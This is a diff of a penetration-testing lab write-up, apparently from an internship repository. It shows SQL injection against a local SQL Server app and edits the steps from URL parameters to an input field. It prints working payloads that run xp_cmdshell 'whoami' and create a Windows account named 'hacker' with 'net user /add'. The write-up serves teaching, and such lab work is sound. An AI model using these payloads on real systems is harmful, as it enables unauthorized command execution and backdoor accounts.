aaronamran/MCSI-Remote-Cybersecurity-Internship/Penetration Testing/arbitrary-command-sql-injection.md

    ```
    SELECT * FROM sys.syslogins WHERE name = 'username';
    ```
-11. In the web app, add `?id=1` at the end of the URL to check and retrieve data with ID = 1 stored in the database table
+11. In the web app, add `1` into the user input field to check and retrieve data with ID = 1 stored in the database table
 12. To inject `xp_cmdshell` into the query, use a dynamic SQL within the query as the following.
 The SQL Server interprets and run a dynamic SQL string which would not be blocked in a standard SQL query
     ```
-    http://localhost/vulnsql/vuln.php?id=1'; EXEC xp_cmdshell 'whoami';--
+    1'; EXEC xp_cmdshell 'whoami';--
     ```
     ![image](https://github.com/user-attachments/assets/9ec1f657-8509-40ee-b7a0-4b1e167e1871)
-13. To use SQL injection to create a new user `hacker` with password `hacked1337`, use the following SQL injection strings at the end of the web app's URL
+13. To use SQL injection to create a new user `hacker` with password `hacked1337`, use the following SQL injection strings inside the user input field
     ```
     http://localhost/vulnsql/vuln.php?id=1'; EXEC xp_cmdshell 'net user hacker hacked1337 /add';--
     ```